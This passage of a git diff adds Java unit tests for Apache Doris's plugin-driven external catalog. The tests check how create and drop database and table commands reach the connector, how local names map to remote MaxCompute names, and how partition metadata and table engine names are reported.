NOT stubbed: it must never + // be consulted (the && short-circuits on the capability gate). + Map props = new HashMap<>(); + + catalog.createDb("db1", true, props); + + // WHY (Rule 9): the capability gate keeps jdbc/es/trino byte-identical -- a connector that + // cannot create databases must fall through to createDatabase ("not supported" in + // production), and the && must short-circuit so the remote databaseExists query is never + // even issued. MUTATION: dropping the `supportsCreateDatabase() &&` gate makes databaseExists + // get consulted here -> the never().databaseExists verify goes red (createDatabase still runs + // because databaseExists defaults to false; the gate's job is to skip the remote probe). + Mockito.verify(metadata, Mockito.never()).databaseExists(Mockito.any(), Mockito.any()); + Mockito.verify(metadata).createDatabase(session, "db1", props); + } + + // ==================== DROP DATABASE ==================== + + @Test + public void testDropDbRoutesToConnectorAndUnregisters() throws Exception { + catalog.dbNullableResult = Mockito.mock(ExternalDatabase.class); + + catalog.dropDb("db1", false, false); + + Mockito.verify(metadata).dropDatabase(session, "db1", false, false); + Mockito.verify(mockEditLog).logDropDb(Mockito.any()); + Assertions.assertEquals("db1", catalog.unregisteredDb, + "dropDb must remove the db from the cache (legacy afterDropDb parity)"); + } + + @Test + public void testDropDbIfExistsWhenMissingIsNoop() throws Exception { + catalog.dbNullableResult = null; // db not present + + catalog.dropDb("missing", true, false); + + Mockito.verify(metadata, Mockito.never()) + .dropDatabase(Mockito.any(), Mockito.any(), Mockito.anyBoolean(), Mockito.anyBoolean()); + Assertions.assertNull(catalog.unregisteredDb); + } + + @Test + public void testDropDbMissingWithoutIfExistsThrows() { + catalog.dbNullableResult = null; + + Assertions.assertThrows(DdlException.class, () -> catalog.dropDb("missing", false, false)); + Mockito.verifyNoInteractions(metadata); + } + + @Test + public void testDropDbWrapsConnectorException() { + catalog.dbNullableResult = Mockito.mock(ExternalDatabase.class); + Mockito.doThrow(new DorisConnectorException("boom")) + .when(metadata).dropDatabase(Mockito.any(), Mockito.any(), Mockito.anyBoolean(), Mockito.anyBoolean()); + + DdlException ex = Assertions.assertThrows(DdlException.class, + () -> catalog.dropDb("db1", false, false)); + Assertions.assertTrue(ex.getMessage().contains("boom")); + } + + @Test + public void testDropDbForceForwardsForceTrueToConnector() throws Exception { + catalog.dbNullableResult = Mockito.mock(ExternalDatabase.class); + + catalog.dropDb("db1", false, true); + + // WHY (Rule 9 / Rule 12): the regression (DG-3) is that the user's FORCE intent was + // silently dropped at the FE→SPI boundary, so DROP DB FORCE stopped cascading table + // drops. This asserts force=true actually reaches the connector. A mutation reverting + // PluginDrivenExternalCatalog.dropDb to the 3-arg / hardcoded-false call makes it red. + Mockito.verify(metadata).dropDatabase(session, "db1", false, true); + } + + @Test + public void testDropDbNonForceForwardsForceFalseToConnector() throws Exception { + catalog.dbNullableResult = Mockito.mock(ExternalDatabase.class); + + catalog.dropDb("db1", false, false); + + // WHY: guards that the fix does NOT over-correct into always-cascading -- a plain + // (non-FORCE) DROP DB must forward force=false so the connector never deletes tables. + Mockito.verify(metadata).dropDatabase(session, "db1", false, false); + } + + // ==================== DROP TABLE ==================== + // FIX-DDL-REMOTE: dropTable now resolves the local db/table names to their REMOTE (ODPS) + // names (via getDbNullable + db.getTableNullable + getRemoteDbName/getRemoteName) before + // calling the connector, mirroring base ExternalCatalog.dropTable / legacy + // MaxComputeMetadataOps.dropTableImpl. Every drop test therefore stubs dbNullableResult and + // db.getTableNullable; edit log / cache invalidation still use the LOCAL names. + + @Test + public void testDropTableResolvesRemoteNamesRoutesAndUnregisters() throws Exception { + // local db1.t1 maps to remote DB1.TBL1 (name mapping enabled). + ExternalDatabase db = mockExternalDatabase(); // resolution db (getDbNullable) + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("DB1"); + Mockito.when(table.getRemoteName()).thenReturn("TBL1"); + Mockito.doReturn(table).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + // Distinct replay db: locks that cache invalidation uses the getDbForReplay lookup, NOT + // the resolution db (a refactor routing unregister through the resolution db must go red). + ExternalDatabase replayDb = mockExternalDatabase(); + catalog.dbForReplayResult = Optional.of(replayDb); + + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + Mockito.when(metadata.getTableHandle(session, "DB1", "TBL1")).thenReturn(Optional.of(handle)); + + catalog.dropTable("db1", "t1", false, false, false, false, false, false); + + // WHY: the connector must receive the REMOTE names so name-mapped catalogs hit the real + // ODPS object; a mutation that passes the local "db1"/"t1" makes this verify red. + Mockito.verify(metadata).getTableHandle(session, "DB1", "TBL1"); + Mockito.verify(metadata).dropTable(session, handle); + // WHY: edit log + cache invalidation MUST use the LOCAL names -- followers replay the + // persisted DropInfo and the on-FE cache is keyed by local name. A mutation building + // DropInfo / looking up getDbForReplay with the remote names must turn these red. + ArgumentCaptor dropInfo = + ArgumentCaptor.forClass(org.apache.doris.persist.DropInfo.class); + Mockito.verify(mockEditLog).logDropTable(dropInfo.capture()); + Assertions.assertEquals("db1", dropInfo.getValue().getDb(), + "edit-log DropInfo must carry the LOCAL db name for follower replay"); + Assertions.assertEquals("t1", dropInfo.getValue().getTableName(), + "edit-log DropInfo must carry the LOCAL table name for follower replay"); + Assertions.assertEquals("db1", catalog.lastGetDbForReplayArg, + "cache invalidation must look up the LOCAL db name"); + Mockito.verify(replayDb).unregisterTable("t1"); + Mockito.verify(db, Mockito.never()).unregisterTable(Mockito.anyString()); + } + + @Test + public void testDropTableMissingDbThrowsEvenWithIfExists() { + catalog.dbNullableResult = null; // db not present + + // WHY: mirror base ExternalCatalog.dropTable -- a missing db ALWAYS throws, even with + // IF EXISTS (only a missing TABLE honors IF EXISTS). A mutation that ifExists-gates the + // db==null branch makes this test red. + Assertions.assertThrows(DdlException.class, + () -> catalog.dropTable("missing", "t1", false, false, false, true, false, false)); + Mockito.verifyNoInteractions(metadata); + } + + @Test + public void testDropTableIfExistsWhenMissingTableIsNoop() throws Exception { + ExternalDatabase db = mockExternalDatabase(); + Mockito.doReturn(null).when(db).getTableNullable("missing"); + catalog.dbNullableResult = db; + + catalog.dropTable("db1", "missing", false, false, false, true, false, false); + + // Table missing + IF EXISTS => no-op; the connector is never even consulted. + Mockito.verifyNoInteractions(metadata); + Mockito.verify(mockEditLog, Mockito.never()).logDropTable(Mockito.any()); + } + + @Test + public void testDropTableMissingTableWithoutIfExistsThrows() { + ExternalDatabase db = mockExternalDatabase(); + Mockito.doReturn(null).when(db).getTableNullable("missing"); + catalog.dbNullableResult = db; + + Assertions.assertThrows(DdlException.class, + () -> catalog.dropTable("db1", "missing", false, false, false, false, false, false)); + Mockito.verifyNoInteractions(metadata); + } + + @Test + public void testDropTableHandleAbsentAfterLocalResolveIsNoopWithIfExists() throws Exception { + // FE cache has the table (resolves locally), but it was dropped out-of-band remotely: + // getTableHandle returns empty. IF EXISTS must still no-op. + ExternalDatabase db = mockExternalDatabase(); + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("DB1"); + Mockito.when(table.getRemoteName()).thenReturn("TBL1"); + Mockito.doReturn(table).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + Mockito.when(metadata.getTableHandle(session, "DB1", "TBL1")).thenReturn(Optional.empty()); + + catalog.dropTable("db1", "t1", false, false, false, true, false, false); + + Mockito.verify(metadata).getTableHandle(session, "DB1", "TBL1"); + Mockito.verify(metadata, Mockito.never()).dropTable(Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logDropTable(Mockito.any()); + } + + @Test + public void testDropTableHandleAbsentAfterLocalResolveThrowsWithoutIfExists() { + ExternalDatabase db = mockExternalDatabase(); + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("DB1"); + Mockito.when(table.getRemoteName()).thenReturn("TBL1"); + Mockito.doReturn(table).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + Mockito.when(metadata.getTableHandle(session, "DB1", "TBL1")).thenReturn(Optional.empty()); + + Assertions.assertThrows(DdlException.class, + () -> catalog.dropTable("db1", "t1", false, false, false, false, false, false)); + Mockito.verify(metadata, Mockito.never()).dropTable(Mockito.any(), Mockito.any()); + } + + @Test + public void testDropTableWrapsConnectorException() { + ExternalDatabase db = mockExternalDatabase(); + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("DB1"); + Mockito.when(table.getRemoteName()).thenReturn("TBL1"); + Mockito.doReturn(table).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + Mockito.when(metadata.getTableHandle(session, "DB1", "TBL1")).thenReturn(Optional.of(handle)); + Mockito.doThrow(new DorisConnectorException("boom")) + .when(metadata).dropTable(session, handle); + + DdlException ex = Assertions.assertThrows(DdlException.class, + () -> catalog.dropTable("db1", "t1", false, false, false, false, false, false)); + Assertions.assertTrue(ex.getMessage().contains("boom")); + } + + // ==================== CREATE TABLE ==================== + // FIX-DDL-REMOTE: createTable now resolves the local db name to its REMOTE (ODPS) name (via + // getDbNullable + db.getRemoteName()) and passes THAT to the converter; the table name is + // intentionally NOT remote-resolved (legacy parity). Edit log / cache invalidation still use + // the local names. + + @Test + public void testCreateTablePassesRemoteDbNameToConverter() throws UserException { + // local db1 maps to remote DB1. + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + catalog.dbNullableResult = db; + catalog.dbForReplayResult = Optional.of(db); + + try (MockedStatic conv = + Mockito.mockStatic(CreateTableInfoToConnectorRequestConverter.class)) { + ConnectorCreateTableRequest req = Mockito.mock(ConnectorCreateTableRequest.class); + conv.when(() -> CreateTableInfoToConnectorRequestConverter.convert(Mockito.any(), Mockito.any())) + .thenReturn(req); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + + catalog.createTable(info); + + // WHY: the converter (and thus the connector) must receive the REMOTE db name "DB1", + // not the local "db1", so name-mapped catalogs address the real ODPS schema. We assert + // on the SECOND argument actually passed to convert() -- NOT on req.getDbName(), which + // would be vacuous here because the converter is mocked and returns a stub unaffected + // by the dbName argument. A mutation that passes info.getDbName() makes this red. + conv.verify(() -> CreateTableInfoToConnectorRequestConverter.convert(info, "DB1")); + } + } + + @Test + public void testCreateTableMissingDbThrows() { + catalog.dbNullableResult = null; // db not present + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("missing"); + + Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); + Mockito.verifyNoInteractions(metadata); + } + + @Test + public void testCreateTableInvalidatesDbCacheUsingLocalNames() throws UserException { + // remote DB1 != local db1, so the LOCAL-name assertions below are meaningful. + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + catalog.dbNullableResult = db; + ExternalDatabase replayDb = mockExternalDatabase(); + catalog.dbForReplayResult = Optional.of(replayDb); + + try (MockedStatic conv = + Mockito.mockStatic(CreateTableInfoToConnectorRequestConverter.class)) { + ConnectorCreateTableRequest req = Mockito.mock(ConnectorCreateTableRequest.class); + conv.when(() -> CreateTableInfoToConnectorRequestConverter.convert(Mockito.any(), Mockito.any())) + .thenReturn(req); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + + catalog.createTable(info); + + Mockito.verify(metadata).createTable(session, req); + // WHY: edit log MUST carry the LOCAL names (followers replay this persist entry), even + // though the connector got the remote "DB1". A mutation persisting db.getRemoteName() + // must turn these red. + ArgumentCaptor persist = + ArgumentCaptor.forClass(org.apache.doris.persist.CreateTableInfo.class); + Mockito.verify(mockEditLog).logCreateTable(persist.capture()); + Assertions.assertEquals("db1", persist.getValue().getDbName(), + "edit-log CreateTableInfo must carry the LOCAL db name for follower replay"); + Assertions.assertEquals("t1", persist.getValue().getTblName(), + "edit-log CreateTableInfo must carry the LOCAL table name for follower replay"); + // Cache invalidation must look up the LOCAL db name and act on the replay db. + Assertions.assertEquals("db1", catalog.lastGetDbForReplayArg, + "cache invalidation must look up the LOCAL db name"); + Mockito.verify(replayDb).resetMetaCacheNames(); + } + } + + @Test + public void testCreateTableIfNotExistsExistingRemoteTableReturnsTrueAndSkipsSideEffects() throws Exception { + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + catalog.dbNullableResult = db; + // Distinct replay db: production resets the cache via getDbForReplay(...).resetMetaCacheNames() + // on the REPLAY db object (NOT catalog.resetMetaCacheNames()), so we must assert on it. + ExternalDatabase replayDb = mockExternalDatabase(); + catalog.dbForReplayResult = Optional.of(replayDb); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + Mockito.when(metadata.getTableHandle(session, "DB1", "t1")).thenReturn(Optional.of(handle)); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + Mockito.when(info.isIfNotExists()).thenReturn(true); + + boolean res = catalog.createTable(info); + + // WHY (Rule 9 / DG-6): returning false here makes CreateTableCommand:103 not short-circuit, + // so CTAS (CREATE TABLE IF NOT EXISTS ... AS SELECT) runs an INSERT into the pre-existing + // table -- a SILENT DATA CHANGE. The fix must return true and skip create/editlog/cache-reset. + Assertions.assertTrue(res, + "IF NOT EXISTS on an existing table must return true so CTAS short-circuits (no INSERT)"); + Mockito.verify(metadata, Mockito.never()).createTable(Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); + Mockito.verify(replayDb, Mockito.never()).resetMetaCacheNames(); + } + + @Test + public void testCreateTableIfNotExistsExistingLocalTableReturnsTrue() throws Exception { + // Remote says absent (getTableHandle empty) but the FE cache HAS it -- the local arm of the + // legacy OR (createTableImpl:189, the case-sensitivity / stale-remote guard). + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + Mockito.doReturn(Mockito.mock(ExternalTable.class)).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + Mockito.when(metadata.getTableHandle(session, "DB1", "t1")).thenReturn(Optional.empty()); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + Mockito.when(info.isIfNotExists()).thenReturn(true); + + boolean res = catalog.createTable(info); + + // WHY: legacy checks BOTH remote AND local; this pins the local arm so a refactor that drops + // the `|| db.getTableNullable(...) != null` probe (keeping only getTableHandle) goes red. + Assertions.assertTrue(res, "existing local table + IF NOT EXISTS must return true"); + Mockito.verify(metadata, Mockito.never()).createTable(Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); + } + + @Test + public void testCreateTableExistingTableWithoutIfNotExistsStillErrors() throws Exception { + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + catalog.dbNullableResult = db; + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + Mockito.when(metadata.getTableHandle(session, "DB1", "t1")).thenReturn(Optional.of(handle)); + + try (MockedStatic conv = + Mockito.mockStatic(CreateTableInfoToConnectorRequestConverter.class)) { + ConnectorCreateTableRequest req = Mockito.mock(ConnectorCreateTableRequest.class); + conv.when(() -> CreateTableInfoToConnectorRequestConverter.convert(Mockito.any(), Mockito.any())) + .thenReturn(req); + Mockito.doThrow(new DorisConnectorException("Table 't1' already exists in database 'DB1'")) + .when(metadata).createTable(session, req); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + Mockito.when(info.isIfNotExists()).thenReturn(false); + + // WHY (Rule 9 / Rule 12): existing table + NO IF NOT EXISTS must NOT short-circuit -- it + // must reach connector.createTable and surface its "already exists" as DdlException + // (fail-loud, legacy parity). A mutation that returns true on `exists` regardless of + // isIfNotExists() would skip createTable -> no throw -> this assertThrows + verify go red. + DdlException ex = Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); + Assertions.assertTrue(ex.getMessage().contains("already exists")); + Mockito.verify(metadata).createTable(session, req); + Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); + } + } + + // ==================== helpers ==================== + + @SuppressWarnings("unchecked") + private ExternalDatabase mockExternalDatabase() { + return (ExternalDatabase) Mockito.mock(ExternalDatabase.class); + } + + /** + * Testable subclass: injects a mock connector, neutralizes init machinery, and + * makes the FE-cache hooks observable so DDL routing + cache invalidation can be + * asserted without a full Doris environment. + */ + private static class TestablePluginCatalog extends PluginDrivenExternalCatalog { + ConnectorSession sessionMock; + ExternalDatabase dbNullableResult; + Optional> dbForReplayResult = Optional.empty(); + int resetMetaCacheNamesCount; + String unregisteredDb; + // Records the arg passed to getDbForReplay so tests can assert the cache-invalidation + // lookup uses the LOCAL db name (follower-replay parity), not the remote-resolved one. + String lastGetDbForReplayArg; + + TestablePluginCatalog(Connector initial) { + super(1L, "test-catalog", null, testProps(), "", initial); + this.initialized = true; + } + + @Override + protected void initLocalObjectsImpl() { + // no-op: connector is injected via constructor; skip txn-manager/auth setup. + } + + @Override + public ConnectorSession buildConnectorSession() { + return sessionMock; + } + + @Override + public ExternalDatabase getDbNullable(String dbName) { + return dbNullableResult; + } + + @Override + public Optional> getDbForReplay(String dbName) { + lastGetDbForReplayArg = dbName; + return dbForReplayResult; + } + + @Override + public void resetMetaCacheNames() { + resetMetaCacheNamesCount++; + } + + @Override + public void unregisterDatabase(String dbName) { + unregisteredDb = dbName; + } + + private static Map testProps() { + Map props = new HashMap<>(); + props.put("type", "test"); + return props; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTableEngineTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTableEngineTest.java index 2c3173af8c0e4e..1ee02a59c3ce91 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTableEngineTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTableEngineTest.java @@ -17,6 +17,8 @@ package org.apache.doris.datasource; +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.PrimitiveType; import org.apache.doris.catalog.TableIf.TableType; import org.apache.doris.connector.api.Connector; import org.apache.doris.connector.api.ConnectorColumn; @@ -25,11 +27,15 @@ import org.apache.doris.connector.api.ConnectorTableSchema; import org.apache.doris.connector.api.ConnectorType; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.thrift.TTableDescriptor; +import org.apache.doris.thrift.TTableType; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import org.mockito.ArgumentCaptor; import org.mockito.Mockito; +import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; import java.util.List; @@ -58,6 +64,17 @@ public void testEsCatalogReturnsEsEngineName() { "ES catalog tables should report engine='es'"); } + @Test + public void testMaxComputeCatalogReturnsLegacyEngineName() { + PluginDrivenExternalTable table = createTableWithCatalogType("max_compute"); + // Legacy MaxComputeExternalTable did not override getEngine(); its type + // MAX_COMPUTE_EXTERNAL_TABLE has no case in TableType.toEngineName(), so the + // engine name was null. The migrated table must reproduce that exactly, + // otherwise SHOW TABLE STATUS / information_schema.tables would regress. + Assertions.assertNull(table.getEngine(), + "MaxCompute catalog tables should report the legacy null engine name"); + } + @Test public void testUnknownCatalogReturnsPluginEngineName() { PluginDrivenExternalTable table = createTableWithCatalogType("custom_type"); @@ -81,6 +98,14 @@ public void testEsCatalogReturnsEsEngineTableTypeName() { "ES catalog tables should report ES_EXTERNAL_TABLE type name"); } + @Test + public void testMaxComputeCatalogReturnsMaxComputeEngineTableTypeName() { + PluginDrivenExternalTable table = createTableWithCatalogType("max_compute"); + Assertions.assertEquals(TableType.MAX_COMPUTE_EXTERNAL_TABLE.name(), + table.getEngineTableTypeName(), + "MaxCompute catalog tables should report MAX_COMPUTE_EXTERNAL_TABLE type name"); + } + @Test public void testUnknownCatalogReturnsPluginEngineTableTypeName() { PluginDrivenExternalTable table = createTableWithCatalogType("custom_type"); @@ -121,6 +146,80 @@ public void testInitSchemaAppliesRemoteColumnNameMapping() { "Mapped remote column names should be reflected in Doris schema metadata"); } + /** + * Verifies the fe-core call site of {@link PluginDrivenExternalTable#toThrift()}: it must pass + * the REMOTE db/table names and the schema column count into + * {@code ConnectorMetadata.buildTableDescriptor(...)}. + * + *

WHY this matters: after the max_compute cutover, BE static_casts the descriptor to + * {@code MaxComputeTableDescriptor} and reads {@code project}/{@code table} (built by + * {@code MaxComputeConnectorMetadata.buildTableDescriptor} from these two args) as the JNI + * read-session addressing contract, which uses REMOTE names. If the call site passed the LOCAL + * names (or a wrong numCols), the descriptor would address the wrong ODPS project/table and the + * column count would be inconsistent with the schema, breaking reads. The connector-module UT + * ({@code MaxComputeBuildTableDescriptorTest}) only covers the override's own output; this test + * is the only automated guard on the cross-module WIRING. + * + *

It FAILS if the call site is changed to pass {@code db.getFullName()}/{@code getName()} + * (local names) or any column count other than {@code schema.size()}. + */ + @Test + public void testToThriftPassesRemoteNamesAndNumColsToBuildTableDescriptor() { + ConnectorMetadata meta = Mockito.mock(ConnectorMetadata.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("max_compute", meta); + + // Local names differ from remote names, so a regression that passes local names is caught. + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + Mockito.when(db.getFullName()).thenReturn("mydb"); + Mockito.when(db.getRemoteName()).thenReturn("REMOTE_DB"); + + // Schema with a known, non-trivial column count so numCols regressions are caught. + final int expectedNumCols = 3; + final List schema = new ArrayList<>(); + for (int i = 0; i < expectedNumCols; i++) { + schema.add(new Column("c" + i, PrimitiveType.INT)); + } + + // Subclass stubs ONLY the two Env-backed methods toThrift() traverses (catalog/db init and + // schema-cache lookup), isolating the call-site wiring without standing up Env/CatalogMgr. + PluginDrivenExternalTable table = new PluginDrivenExternalTable( + 1L, "mytbl", "REMOTE_TBL", catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip real catalog/db initialization (Env-backed) + } + + @Override + public List getFullSchema() { + return schema; + } + }; + + TTableDescriptor stub = new TTableDescriptor(1L, TTableType.MAX_COMPUTE_TABLE, + expectedNumCols, 0, "mytbl", "REMOTE_DB"); + Mockito.when(meta.buildTableDescriptor( + Mockito.any(), Mockito.anyLong(), Mockito.anyString(), Mockito.anyString(), + Mockito.anyString(), Mockito.anyInt(), Mockito.anyLong())) + .thenReturn(stub); + + table.toThrift(); + + ArgumentCaptor dbNameCaptor = ArgumentCaptor.forClass(String.class); + ArgumentCaptor remoteNameCaptor = ArgumentCaptor.forClass(String.class); + ArgumentCaptor numColsCaptor = ArgumentCaptor.forClass(Integer.class); + Mockito.verify(meta).buildTableDescriptor( + Mockito.any(ConnectorSession.class), Mockito.anyLong(), Mockito.anyString(), + dbNameCaptor.capture(), remoteNameCaptor.capture(), + numColsCaptor.capture(), Mockito.anyLong()); + + Assertions.assertEquals("REMOTE_DB", dbNameCaptor.getValue(), + "toThrift() must pass db.getRemoteName() as dbName, not the local db name"); + Assertions.assertEquals("REMOTE_TBL", remoteNameCaptor.getValue(), + "toThrift() must pass table.getRemoteName() as remoteName, not the local table name"); + Assertions.assertEquals(expectedNumCols, numColsCaptor.getValue().intValue(), + "toThrift() must pass schema.size() as numCols"); + } + // -------- Helpers -------- private PluginDrivenExternalTable createTableWithCatalogType(String catalogType) { @@ -169,10 +268,20 @@ private ExternalDatabase mockExternalDatabase() { */ private static class TestablePluginCatalog extends PluginDrivenExternalCatalog { private final String catalogType; + private final Connector connector; + + TestablePluginCatalog(String catalogType) { + this(catalogType, mockConnector(Mockito.mock(ConnectorMetadata.class))); + } - TestablePluginCatalog(String catalogType, Connector connector) { + TestablePluginCatalog(String catalogType, ConnectorMetadata meta) { + this(catalogType, mockConnector(meta)); + } + + private TestablePluginCatalog(String catalogType, Connector connector) { super(1L, "test-catalog", null, makeProps(catalogType), "", connector); this.catalogType = catalogType; + this.connector = connector; } @Override @@ -180,6 +289,13 @@ public String getType() { return catalogType; } + @Override + public Connector getConnector() { + // Bypass the parent's makeSureInitialized() (Env-backed catalog init) so the call-site + // wiring test can reach toThrift() without standing up Env/CatalogMgr. + return connector; + } + @Override protected List listDatabaseNames() { return Collections.emptyList(); @@ -200,5 +316,11 @@ private static Map makeProps(String type) { props.put("type", type); return props; } + + private static Connector mockConnector(ConnectorMetadata meta) { + Connector c = Mockito.mock(Connector.class); + Mockito.when(c.getMetadata(Mockito.any())).thenReturn(meta); + return c; + } } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java new file mode 100644 index 00000000000000..2baded937e621c --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java @@ -0,0 +1,353 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.ListPartitionItem; +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.catalog.PartitionKey; +import org.apache.doris.catalog.PrimitiveType; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorTableSchema; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests for {@link PluginDrivenExternalTable}'s partition-metadata overrides added by + * FIX-PART-GATES: {@code isPartitionedTable}, {@code getPartitionColumns}, + * {@code supportInternalPartitionPruned}, {@code getNameToPartitionItems}, and the + * {@code initSchema} partition-column extraction into {@link PluginDrivenSchemaCacheValue}. + * + *

Why these matter: after the MaxCompute SPI cutover, partition visibility + * (SHOW PARTITIONS / partitions() TVF) and internal partition pruning both depend on these + * overrides. Without them a partitioned MaxCompute table reports as non-partitioned (SHOW + * PARTITIONS throws "not a partitioned table") and large partitioned tables degrade to a + * full scan. The tests lock: (1) partition columns sourced from the cached + * {@code partition_columns} property; (2) {@code getNameToPartitionItems} addressing the + * connector's raw-keyed partition values by the RAW remote column names (not the mapped + * local names); (3) {@code supportInternalPartitionPruned} returning unconditional true (mirroring + * legacy MaxComputeExternalTable) for BOTH partitioned and non-partitioned tables — gating it on + * partition columns silently dropped all rows of filtered non-partitioned scans + * (FIX-NONPART-PRUNE-DATALOSS).

+ */ +public class PluginDrivenExternalTablePartitionTest { + + // ==================== read-back overrides (cache value constructed directly) ==================== + + @Test + public void testPartitionedTableExposesPartitionColumnsAndPruning() { + List schema = Arrays.asList( + new Column("year", PrimitiveType.INT), + new Column("month", PrimitiveType.INT), + new Column("val", PrimitiveType.INT)); + List partitionColumns = Arrays.asList(schema.get(0), schema.get(1)); + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + schema, partitionColumns, Arrays.asList("year", "month")); + PluginDrivenExternalTable table = tableWithCacheValue(cacheValue); + + Assertions.assertTrue(table.isPartitionedTable(), + "a table with partition columns must report isPartitionedTable()==true (SHOW PARTITIONS gate)"); + Assertions.assertEquals(partitionColumns, table.getPartitionColumns(), + "getPartitionColumns() must return the cached partition columns"); + Assertions.assertTrue(table.supportInternalPartitionPruned(), + "a partitioned table must opt into internal partition pruning"); + } + + @Test + public void testNonPartitionedTableReportsNoPartitionsButStillOptsIntoPruning() { + List schema = Collections.singletonList(new Column("val", PrimitiveType.INT)); + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + schema, Collections.emptyList(), Collections.emptyList()); + PluginDrivenExternalTable table = tableWithCacheValue(cacheValue); + + Assertions.assertFalse(table.isPartitionedTable()); + Assertions.assertTrue(table.getPartitionColumns().isEmpty()); + // WHY (FIX-NONPART-PRUNE-DATALOSS): supportInternalPartitionPruned MUST be unconditional true, + // even for a NON-partitioned table (mirrors legacy MaxComputeExternalTable). A previous version + // gated it on partition columns -> returned false here, which sent PruneFileScanPartition down + // its ELSE branch (selection := SelectedPartitions(0, {}, isPruned=true)); PluginDrivenScanNode + // then read that as "pruned to zero" and short-circuited to no splits, so a filtered query over + // a non-partitioned table silently returned ZERO ROWS. With true, the rule's IF branch / + // pruneExternalPartitions returns NOT_PRUNED for empty partition columns -> scan all. A mutation + // reverting to `!getPartitionColumns().isEmpty()` (false here) makes this assertion red. + Assertions.assertTrue(table.supportInternalPartitionPruned(), + "a non-partitioned table must STILL opt into internal partition 